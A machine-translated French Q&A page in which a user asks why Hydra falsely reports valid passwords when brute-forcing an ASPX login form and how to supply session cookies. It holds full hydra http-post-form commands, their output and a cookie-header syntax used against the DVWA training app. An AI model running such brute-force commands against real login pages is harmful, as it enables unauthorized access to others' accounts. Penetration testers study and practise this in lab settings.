web-dev-qa-db-fra.com

Comment obtenir des cookies du site ASPX pour l'utiliser avec Hydra

J'ai joué avec Hydra et .aspx Site et j'ai frappé un peu de chic - Hydra répond me permettant de savoir que les 16 premiers mots de passe de ma liste de mots de passe sont corrects quand aucun d'entre eux n'est.

Syntaxe:

hydra 192.168.88.196 -l admin -P /root/lower http-post-form "/mmm/index.aspx:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect."

Sortir

Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2015-05-05 22:30:51

[DATA] 16 tasks, 1 server, 815 login tries (l:1/p:815), ~50 tries per task

[DATA] attacking service http-get-form on port 80

[80][www-form] Host: 192.168.88.196   login: admin   password: adrianna

[STATUS] attack finished for 192.168.88.196 (waiting for children to finish)

[80][www-form] Host: 192.168.88.196   login: admin   password: adrian

[80][www-form] Host: 192.168.88.196   login: admin   password: aerobics

[80][www-form] Host: 192.168.88.196   login: admin   password: academic

[80][www-form] Host: 192.168.88.196   login: admin   password: access

[80][www-form] Host: 192.168.88.196   login: admin   password: abc

[80][www-form] Host: 192.168.88.196   login: admin   password: admin

[80][www-form] Host: 192.168.88.196   login: admin   password: academia

[80][www-form] Host: 192.168.88.196   login: admin   password: albatross

[80][www-form] Host: 192.168.88.196   login: admin   password: alex

[80][www-form] Host: 192.168.88.196   login: admin   password: airplane

[80][www-form] Host: 192.168.88.196   login: admin   password: albany

[80][www-form] Host: 192.168.88.196   login: admin   password: ada

[80][www-form] Host: 192.168.88.196   login: admin   password: aaa

[80][www-form] Host: 192.168.88.196   login: admin   password: albert

[80][www-form] Host: 192.168.88.196   login: admin   password: alexander

1 of 1 target successfuly completed, 16 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-05-05 22:30:51

J'ai lu que nous pouvons ajouter des cookies à Hydra d'accord: "H=Cookie: security;low;PHPSESSID=<value for PHP SESSID cookie"

  1. Comment obtenez-vous des cookies d'ASPX?
  2. Comment le fournissez-vous à Hydra?
authenticationpasswordspenetration-testbrute-forcepassword-cracking
4
user3306821

Utilisez un plugin de navigateur tel que - Cookies Manager Plus sur Firefox, vous pouvez simplement copier la valeur dans le presse-papiers.

Comme vous le dites, il suffit de coller la valeur dans la ligne de commande pour Hydra.

Voir ma réponse ici pour la syntaxe qui a fonctionné pour moi.

"/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=07b7ebb2faea96f8471ecdb759e68108; security=low"

Donc, au lieu de PHPSESSID et la valeur que vous incluez le nom de l'ID de session ASP.NET et de la valeur.

4
SilverlightFox